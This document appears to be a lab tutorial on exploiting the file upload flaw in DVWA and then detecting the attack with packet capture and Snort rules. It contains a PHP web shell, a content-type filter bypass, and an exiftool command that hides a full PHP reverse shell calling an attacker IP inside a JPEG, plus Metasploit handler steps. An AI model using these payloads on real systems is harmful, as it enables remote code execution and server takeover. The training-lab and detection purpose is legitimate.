File upload Vulnerability [DVWA]

Today, we will be covering file inclusion. Our goal for today is

• Learn the methodology behind File Upload Attack
• How to carry out File Upload?
• Network Perspective
• How to know if the attack was successful?
• How to detect a File Upload attack using snort?

Methodology:

When a?web server allows users to upload files?to its?filesystem without sufficiently validating their name, type, contents, or size, failing?to properly enforce restrictions on these could mean that even a?basic image upload function can be used to upload arbitrary and potentially dangerous files instead.?This could even include server-side script files that enable remote code execution.

How to carry out File Upload?

Low:

Remember the reverse shell that we had in our RFI attack? We can upload that to the web application while Netcat listens for the connection. Let's do it.

Note: make sure your anti-virus is disabled.

Let's set up our Netcat listener.

nc --nlvp 1337        

Let's upload our reverse shell to the server.

Here is an example of a one-liner reverse shell

<?php system($_REQUEST["cmd"]); ?>        

Medium:

Let's switch our difficulty to medium and try to upload the one_liner.php to the web application.

As we can see, the webserver is not accepting file uploads besides JPEG or PNG images. That means we have to trick HTTP requests into thinking that the PHP file we uploaded is an image file. To do this, we will use the burp suite.

Proxy -> Intercept -> Open Browser -> Log into DVWA using Burp Browser ->

Click Upload, and you will get this:

Go to Burp suite -> Proxy -> HTTP history

Locate the POST /DVWA/vulnerabilities/upload and Right click Request

Then, Click on Send to Repeater

Then, click on Repeater Tab and Click Send to see what the response looks like.

This is equivalent to what we have here:

Anyways, let's focus on this portion of the Request:

We can try to change the .php to .jpeg to see if that bypass the filter. That didn't work because we still got the same error.

Let's reverse our change, change the Content-type, and see what happens.

Our PHP has been successfully uploaded. As we can see, we manage to execute whoami

High:

First, we will save an image.

Then, we will use this command to save our PHP inside the JPEG.

exiftool -DocumentName='/*<?php /**/ error_reporting(0); $ip = "192.168.233.189"; $port = 4444; if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = "stream"; } elseif (($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type = "stream"; } elseif (($f = "socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = "socket"; } else { die("no socket funcs"); } if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; eval($b); die(); __halt_compiler();' PictureName.jpeg         

My picture name was Sunflower_small.jpg.

Remember to change the IP to your attack VM.

We can use this command to see what we put inside the picture.

exiftool pictureName.jpg

Let's open Metasploit by doing?msfconsole?this in the command prompt. Then, type?use exploit/multi/handler?->?set payload php/meterpreter/reverse_tcp?-> Show options -> Set LHOST to attacker IP -> run

Now, upload our picture.

There you go, we have a shell.

Network Perspective

Let's capture the File upload Attack using PFsense.

Let's upload our reverse_tcp

You can find the packet capture of the file upload attack here:

Whenever we open our PCAP file, we first need to come up with an idea of what we're looking for. So, for this attack. We will focus more on HTTP traffic and some sign of an adversary submitting a file or executing commands.

We can create a display filter that only shows HTTP traffic by typing:?HTTP

That cleared up the rest of the information we didn't need.

Additionally, we can see what the adversary executed in the URL. After the command is completed, we get an HTTP/1.1 200 OK, which contains information about the command inside the packet.

We can use this as a sign to see if the attack was successful. If nothing gets returned from the cmd request, then the attack failed; if something got returned, we can assume that the attack was successful.

How to detect File Injection using snort?

Let's pretend we created something similar to what DVWA has.

What we can do is monitor other types of file extensions that are submitted.

For example, we're only accepting pictures such as JPEG and PNG. We can create a Snort Rule that monitors other file extensions. Let's get right into it.

sudo nano /etc/snort/rules/local.rules
alert tcp any any -> 172.20.25.16 80 (content:"GET"; http_method; content:!"|2E|jpeg"; http_uri; msg: "File Injection Detected"; sid: 1000001; rev: 1;)
alert tcp any any -> 172.20.25.16 80 (content:"GET"; http_method; content:!"|2E|png"; http_uri; msg: "File Injection Detected"; sid: 10000001; rev: 1;)
alert tcp any any -> 172.20.25.16 80 (content:"GET"; http_method; content:!"|2E|jpg"; http_uri; msg: "File Injection Detected"; sid: 10000001; rev: 1;)        

Let's cover the first rule; it will be easier to understand the rest after you understand the first one.

Alert me when you found a TCP connection going to 172.20.25.16 on port 80 (HTTP) and that the HTTP request is a GET and the HTTP URI is anything but (. JPEG, .PNG, .JPG).

Note: |2E| is the hexadecimal for .

Let's test our rule to see if it works!

sudo snort -c /etc/snort/snort.conf        

Let's try uploading a python file to see if snort will detect it.

That is all I have for File Injection Vulnerability. The next vulnerability we will be covering is SQL Injection

[Click-Here] for SQL Injection.